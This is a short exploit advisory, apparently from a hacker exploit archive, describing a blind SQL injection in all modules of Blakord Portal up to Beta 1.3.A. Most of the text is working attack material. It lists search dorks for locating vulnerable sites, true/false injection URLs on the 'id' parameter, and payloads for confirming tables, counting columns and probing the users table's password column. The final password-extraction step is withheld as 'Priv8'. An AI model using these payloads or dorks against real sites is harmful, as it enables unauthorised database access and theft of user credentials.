Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection.
[+] Info: [~] Software: Blakord Portal [~] HomePage: http://www.cdv3k.com [~] Exploit: Blind Sql Injection [High] [~] Where: All Modules [~] Bug Found By: JosS / Jose Luis Góngora Fernández [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Dork: "Power by Blakord Portal" [~] Dork2: "Powered by Blakord Portal" [~] Dork3: "Blakord Portal" [+] Compression: [~] True: http://localhost/[path]/[any module]?id=1 and 1=1 [~] False: http://localhost/[path]/[any module]?id=1 and 1=2 [+] Exploding: [*] Checking table: [~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0 [~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE]) [~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0 [~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users) [~] If you don't see any error, it is tha table exist. [*] Checking columns number of table: [~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER] [~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6 [~] If you don't see any error, the table has 6 columns. [*] Checking columns of table: [~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0 [~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0 [~] If you don't see any error, the column exists. [*] Admin Password; Noob or Lammer?: [~] Exploit: Priv8 [~] Example: Priv8 [~] Priv8 , xD. [+] [The End]
